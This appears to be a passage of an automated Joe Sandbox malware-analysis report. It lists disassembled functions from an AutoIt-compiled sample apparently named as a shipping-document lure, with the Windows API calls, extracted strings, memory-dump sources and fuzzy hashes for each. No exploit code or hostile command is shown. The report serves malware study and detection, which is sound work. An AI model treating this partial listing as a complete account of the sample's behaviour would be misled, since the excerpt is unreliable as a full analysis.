                                                                • Instruction Fuzzy Hash: 28C154322091530ADF1DC63B847423EBAA55EA27B371A076EDCB2DB1D4EE14C96DD720
                                                                Function 00951978 Relevance: .3, Instructions: 323COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction ID: e787d4c5994279f3c8b3960844679e5b575301e9e763dc7488e5457436f63935
                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction Fuzzy Hash: 40C1523220519309DF2DC63BC47423EBAA55EA27B371A175ED8B3CB1D5EE20C9699720
                                                                Function 009A7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 009A785B
                                                                • DeleteObject.GDI32(00000000), ref: 009A786D
                                                                • DestroyWindow.USER32 ref: 009A787B
                                                                • GetDesktopWindow.USER32 ref: 009A7895
                                                                • GetWindowRect.USER32(00000000), ref: 009A789C
                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009A79DD
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009A79ED
                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7A35
                                                                • GetClientRect.USER32(00000000,?), ref: 009A7A41
                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009A7A7B
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7A9D
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7AB0
                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7ABB
                                                                • GlobalLock.KERNEL32(00000000), ref: 009A7AC4
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7AD3
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 009A7ADC
                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7AE3
                                                                • GlobalFree.KERNEL32(00000000), ref: 009A7AEE
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7B00
                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009C2CAC,00000000), ref: 009A7B16
                                                                • GlobalFree.KERNEL32(00000000), ref: 009A7B26
                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009A7B4C
                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009A7B6B
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7B8D
                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009A7D7A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                • API String ID: 2211948467-2373415609
                                                                • Opcode ID: 654f95e2aa00756951de589229856eccef1b2114d919d28acdfacd5a46527846
                                                                • Instruction ID: 7c5623d7815b0b25b151cea72c5ca42c513d44da97b862052c5bb7891171299e
                                                                • Opcode Fuzzy Hash: 654f95e2aa00756951de589229856eccef1b2114d919d28acdfacd5a46527846
                                                                • Instruction Fuzzy Hash: 86028F71914105EFDB14DFA8CD99EAEBBB9EF49320F008259F915AB2A1C7709D01DFA0
                                                                Function 009B356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,009BF910), ref: 009B3627
                                                                • IsWindowVisible.USER32(?), ref: 009B364B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpperVisibleWindow
                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                • API String ID: 4105515805-45149045
                                                                • Opcode ID: d79dc5c4c5f8097385b3e77b51a0ec8bedcfd7c0c0cc57394e165aa8ad24c155
                                                                • Instruction ID: 72e76558a466b41bba2178afb79fbb768df0aa77f5bd64e3020f33af3dba9dea
                                                                • Opcode Fuzzy Hash: d79dc5c4c5f8097385b3e77b51a0ec8bedcfd7c0c0cc57394e165aa8ad24c155
                                                                • Instruction Fuzzy Hash: ACD1A1702043019BCB14EF11C656BAEBBE5AFD5764F148858FC865B3A2DB31EE0ACB41
                                                                Function 009BA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetTextColor.GDI32(?,00000000), ref: 009BA630
                                                                • GetSysColorBrush.USER32(0000000F), ref: 009BA661
                                                                • GetSysColor.USER32(0000000F), ref: 009BA66D
                                                                • SetBkColor.GDI32(?,000000FF), ref: 009BA687
                                                                • SelectObject.GDI32(?,00000000), ref: 009BA696
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 009BA6C1
                                                                • GetSysColor.USER32(00000010), ref: 009BA6C9
                                                                • CreateSolidBrush.GDI32(00000000), ref: 009BA6D0
                                                                • FrameRect.USER32(?,?,00000000), ref: 009BA6DF
                                                                • DeleteObject.GDI32(00000000), ref: 009BA6E6
                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 009BA731
                                                                • FillRect.USER32(?,?,00000000), ref: 009BA763
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BA78E
                                                                  • Part of subcall function 009BA8CA: GetSysColor.USER32(00000012), ref: 009BA903
                                                                  • Part of subcall function 009BA8CA: SetTextColor.GDI32(?,?), ref: 009BA907
                                                                  • Part of subcall function 009BA8CA: GetSysColorBrush.USER32(0000000F), ref: 009BA91D
                                                                  • Part of subcall function 009BA8CA: GetSysColor.USER32(0000000F), ref: 009BA928
                                                                  • Part of subcall function 009BA8CA: GetSysColor.USER32(00000011), ref: 009BA945
                                                                  • Part of subcall function 009BA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009BA953
                                                                  • Part of subcall function 009BA8CA: SelectObject.GDI32(?,00000000), ref: 009BA964
                                                                  • Part of subcall function 009BA8CA: SetBkColor.GDI32(?,00000000), ref: 009BA96D
                                                                  • Part of subcall function 009BA8CA: SelectObject.GDI32(?,?), ref: 009BA97A
                                                                  • Part of subcall function 009BA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 009BA999
                                                                  • Part of subcall function 009BA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009BA9B0
                                                                  • Part of subcall function 009BA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 009BA9C5
                                                                  • Part of subcall function 009BA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009BA9ED
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 3521893082-0
                                                                • Opcode ID: f40461506e108406c5c81c2d9bfa9580e1bc97f4340d4fed9c562494e8f38afd
                                                                • Instruction ID: 35f6a7eba7b40b25b0925656bab45f142b1e1444a7081ea8ee6512f679efadf7
                                                                • Opcode Fuzzy Hash: f40461506e108406c5c81c2d9bfa9580e1bc97f4340d4fed9c562494e8f38afd
                                                                • Instruction Fuzzy Hash: A2917B7241C301FFCB109F64DE48AAB7BA9FB88331F100B29F962961A0DB71D944DB52
                                                                Function 00932C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32(?,?,?), ref: 00932CA2
                                                                • DeleteObject.GDI32(00000000), ref: 00932CE8
                                                                • DeleteObject.GDI32(00000000), ref: 00932CF3
                                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00932CFE
                                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00932D09
                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0096C43B
                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0096C474
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0096C89D
                                                                  • Part of subcall function 00931B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00932036,?,00000000,?,?,?,?,009316CB,00000000,?), ref: 00931B9A
                                                                • SendMessageW.USER32(?,00001053), ref: 0096C8DA
                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0096C8F1
                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0096C907
                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0096C912
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                • String ID: 0
                                                                • API String ID: 464785882-4108050209
                                                                • Opcode ID: 6515f34c5bda8b2ab56d266a1ca6eb1e5dad8f539f54b522309b95c16747cd27
                                                                • Instruction ID: 212e27918e40aac360de355173f8a0580902ce3570847f81bd24074307983253
                                                                • Opcode Fuzzy Hash: 6515f34c5bda8b2ab56d266a1ca6eb1e5dad8f539f54b522309b95c16747cd27
                                                                • Instruction Fuzzy Hash: A0126C70604201EFDB25CF24C998BB9B7E9BF45310F5485AAF896DB262C731E842DF91
                                                                Function 009A74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32(00000000), ref: 009A74DE
                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009A759D
                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009A75DB
                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009A75ED
                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009A7633
                                                                • GetClientRect.USER32(00000000,?), ref: 009A763F
                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009A7683
                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009A7692
                                                                • GetStockObject.GDI32(00000011), ref: 009A76A2
                                                                • SelectObject.GDI32(00000000,00000000), ref: 009A76A6
                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009A76B6
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009A76BF
                                                                • DeleteDC.GDI32(00000000), ref: 009A76C8
                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009A76F4
                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 009A770B
                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009A7746
                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009A775A
                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 009A776B
                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009A779B
                                                                • GetStockObject.GDI32(00000011), ref: 009A77A6
                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009A77B1
                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009A77BB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                • API String ID: 2910397461-517079104
                                                                • Opcode ID: f095772babf72f47368f3f54b9737a638a5b4884b2222f178f3c53f7669f4f1e
                                                                • Instruction ID: 4c186f8ca08d6cc10b2dfc70e977c81987cf621a6fdff50dd01d050d2ddf9f57
                                                                • Opcode Fuzzy Hash: f095772babf72f47368f3f54b9737a638a5b4884b2222f178f3c53f7669f4f1e
                                                                • Instruction Fuzzy Hash: A3A16F71A54609BFEB14DBA8DD5AFBEBBB9EB45710F014214FA14A72E0C670AD00DF60
                                                                Function 0099AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099AD1E
                                                                • GetDriveTypeW.KERNEL32(?,009BFAC0,?,\\.\,009BF910), ref: 0099ADFB
                                                                • SetErrorMode.KERNEL32(00000000,009BFAC0,?,\\.\,009BF910), ref: 0099AF59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DriveType
                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                • API String ID: 2907320926-4222207086
                                                                • Opcode ID: 2931168adc1f5ee01508a98c716623662838ba9c195a8291b6accca70a8193c2
                                                                • Instruction ID: 61bb7cef6723e2fa9e7d26b5ab34ebf60ac938f6778258515129a9b2e322b7c8
                                                                • Opcode Fuzzy Hash: 2931168adc1f5ee01508a98c716623662838ba9c195a8291b6accca70a8193c2
                                                                • Instruction Fuzzy Hash: 1F51F7F0648205EBCF10DB99C992DBEB3A5EB88704B644466F80BA7690CA709D01DB83
                                                                Function 009368DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                • API String ID: 1038674560-86951937
                                                                • Opcode ID: 0c5a3b5b6df1c9a5536b5353226aac1d04b1964943fb6d5ec5c51281288c61c9
                                                                • Instruction ID: b5e5dc0fb0e07b783c7089da49159f09cfd299e7aa4165ccb1f1a25ececa2861
                                                                • Opcode Fuzzy Hash: 0c5a3b5b6df1c9a5536b5353226aac1d04b1964943fb6d5ec5c51281288c61c9
                                                                • Instruction Fuzzy Hash: 6F81F4B060020ABACB21EB71DC53FBB776CAF85754F048025FD05AB196EB60DE45DBA1
                                                                Function 009BA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSysColor.USER32(00000012), ref: 009BA903
                                                                • SetTextColor.GDI32(?,?), ref: 009BA907
                                                                • GetSysColorBrush.USER32(0000000F), ref: 009BA91D
                                                                • GetSysColor.USER32(0000000F), ref: 009BA928
                                                                • CreateSolidBrush.GDI32(?), ref: 009BA92D
                                                                • GetSysColor.USER32(00000011), ref: 009BA945
                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 009BA953
                                                                • SelectObject.GDI32(?,00000000), ref: 009BA964
                                                                • SetBkColor.GDI32(?,00000000), ref: 009BA96D
                                                                • SelectObject.GDI32(?,?), ref: 009BA97A
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 009BA999
                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009BA9B0
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 009BA9C5
                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009BA9ED
                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009BAA14
                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 009BAA32
                                                                • DrawFocusRect.USER32(?,?), ref: 009BAA3D
                                                                • GetSysColor.USER32(00000011), ref: 009BAA4B
                                                                • SetTextColor.GDI32(?,00000000), ref: 009BAA53
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 009BAA67
                                                                • SelectObject.GDI32(?,009BA5FA), ref: 009BAA7E
                                                                • DeleteObject.GDI32(?), ref: 009BAA89
                                                                • SelectObject.GDI32(?,?), ref: 009BAA8F
                                                                • DeleteObject.GDI32(?), ref: 009BAA94
                                                                • SetTextColor.GDI32(?,?), ref: 009BAA9A
                                                                • SetBkColor.GDI32(?,?), ref: 009BAAA4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 1996641542-0
                                                                • Opcode ID: c3678c7070d28b863565c5d775f9a0dd6a38f0bf0d126ceffcadf101c36e8dcc
                                                                • Instruction ID: 7f31bfc56fa0bb5b509f2b8d46cb3ec46c3c72fcfae2d96612967f86f270b9c8
                                                                • Opcode Fuzzy Hash: c3678c7070d28b863565c5d775f9a0dd6a38f0bf0d126ceffcadf101c36e8dcc
                                                                • Instruction Fuzzy Hash: 70513B71914208FFDF109FA8DD48AEE7BB9EB48330F114625F911AB2A1D7759940EF90
                                                                Function 009B89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009B8AC1
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B8AD2
                                                                • CharNextW.USER32(0000014E), ref: 009B8B01
                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009B8B42
                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009B8B58
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B8B69
                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 009B8B86
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 009B8BD8
                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 009B8BEE
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 009B8C1F
                                                                • _memset.LIBCMT ref: 009B8C44
                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 009B8C8D
                                                                • _memset.LIBCMT ref: 009B8CEC
                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 009B8D16
                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 009B8D6E
                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 009B8E1B
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 009B8E3D
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009B8E87
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009B8EB4
                                                                • DrawMenuBar.USER32(?), ref: 009B8EC3
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 009B8EEB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                • String ID: 0
                                                                • API String ID: 1073566785-4108050209
                                                                • Opcode ID: 10b4f104610e720637aedc05286d76a777bac3402d61ebd5715e6ff937790be6
                                                                • Instruction ID: 92016835e2787e7e80323fc00984eafec64de39d18f1d209e649fb141e0b28a9
                                                                • Opcode Fuzzy Hash: 10b4f104610e720637aedc05286d76a777bac3402d61ebd5715e6ff937790be6
                                                                • Instruction Fuzzy Hash: 6CE16D70914218ABDB20DF65CD84EFF7BBDEF49720F10815AF915AA290DB748A84DF60
                                                                Function 009B488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 009B49CA
                                                                • GetDesktopWindow.USER32 ref: 009B49DF
                                                                • GetWindowRect.USER32(00000000), ref: 009B49E6
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009B4A48
                                                                • DestroyWindow.USER32(?), ref: 009B4A74
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009B4A9D
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B4ABB
                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009B4AE1
